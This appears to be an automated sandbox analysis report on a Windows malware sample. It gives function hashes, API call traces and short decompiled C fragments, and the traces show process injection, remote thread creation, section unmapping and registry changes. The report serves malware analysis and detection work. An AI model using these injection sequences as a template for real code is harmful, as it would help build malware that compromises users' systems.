Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
